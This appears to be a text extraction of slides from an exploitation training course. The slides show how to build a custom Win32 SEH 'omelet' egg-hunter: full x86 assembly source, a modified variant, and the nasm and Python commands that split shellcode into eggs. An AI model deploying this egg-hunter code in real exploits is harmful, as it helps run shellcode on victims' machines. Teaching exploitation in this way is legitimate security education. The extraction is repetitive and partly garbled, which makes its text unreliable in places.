  • 74. start: XOR EDI, EDI jmp SHORT reset_stack create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket MOV EDI, ESI ; EDI = end of egg reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
  • 75. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) w32_SEH_omelet.asm / modified shell code 1
  • 76. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) custom_w32_SEH_omelet.asm marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
  • 77. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) custom_w32_SEH_omelet.asm BITS 32 ; egg: ; LL II M1 M2 M3 DD DD DD ... (LL * DD) ; LL == Size of eggs (same for all eggs) ; II == Index of egg (different for each egg) ; M1,M2,M3 == Marker byte (same for all eggs) ; DD == Data in egg (different for each egg) marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode. db marker_bytes_location db max_index_location db egg_size_location
  • 78. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) custom_w32_SEH_omelet.asm build C:Documents and SettingseduDesktopexamplesTrack33EggHuntingToolsForEggHun tingw32 SEH omelet shellcode v0>"c:Program Filesnasmnasm.exe" -f bin -o cust om_w32_SEH_omelet.bin custom_w32_SEH_omelet.asm -w+error C:Documents and SettingseduDesktopexamplesTrack33EggHuntingToolsForEggHun tingw32 SEH omelet shellcode v0>w32_SEH_omelet.py custom_w32_SEH_omelet.bin she llcode.bin calceggs_custom.txt 127 0xBADA55
  • 79. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) custom_w32_SEH_omelet.asm marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
  • 80. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) custom_w32_SEH_omelet.asm marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
  • 81. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) custom_w32_SEH_omelet.asm marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
  • 82. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) custom_w32_SEH_omelet.asm marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
  • 83. Thank You :) See you the week after next week